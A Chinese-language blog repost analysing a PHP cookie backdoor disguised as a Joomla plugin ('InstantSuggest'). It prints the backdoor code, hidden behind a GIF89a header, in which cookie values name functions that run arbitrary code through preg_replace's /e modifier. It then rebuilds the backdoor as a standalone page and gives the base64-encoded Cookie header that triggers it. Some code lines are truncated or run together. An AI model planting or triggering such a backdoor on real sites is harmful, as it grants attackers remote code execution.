php -- cookie 後門
阿新 • • 發佈:2019-01-29
ttp://blog.sucuri.net/2014/04/joomla-plugin-constructor-backdoor.html
https://gist.github.com/PhilETaylor/8045002
http://www.freebuf.com/articles/web/33275.html
- GIF89a
- <?php
- /**
- * @package Joomla.Plugin
- * @subpackage system.instantsuggest
- *
-
* @copyright Copyright (C) 2013 InstantSuggest.com. All rights reserved.
- * @license GNU General Public License version 2 or later
- */
- /**
- * Instant Suggest Ajax
- *
- * @package Joomla.Plugin
- * @subpackage system.instantsuggest
- * @since 3.1
- */
- class PlgSystemInstantSuggest
- {
- publicfunction __construct() {
-
$filter = @$_COOKIE['p3'
- if ($filter) {
- $option = $filter(@$_COOKIE['p2']);
- $auth = $filter(@$_COOKIE['p1']);
- $option("/123/e",$auth,123);
- die();
- }
- }
- }
利用上述部分程式碼建立頁面bk-001.php,
- <?php
- $filter = @$_COOKIE['p3'];
- if ($filter) {
-
$option
- $auth = $filter(@$_COOKIE['p1']);
- $option("/123/e",$auth,123);
- die();
- }
- ?>
傳送下列cookie值,
Cookie: p3=base64_decode;p2=cHJlZ19yZXBsYWNl;p1=cGhwaW5mbygpOw==
p3=base64_decode;
p2=base64_decode("cHJlZ19yZXBsYWNl") --------> p2=preg_replace;
p1=base64_decode("cGhwaW5mbygpOw==")--------->p1=phpinfo();
有寫朋友可能喜歡使用Linux下的base64程式, 例如:
echo preg_replace | base64
得到的結果是cHJlZ19yZXBsYWNlCg==,致使上述程式碼(phpinfo();)無法執行(0x0a的影響). 建議使用php_encode函式加密字串.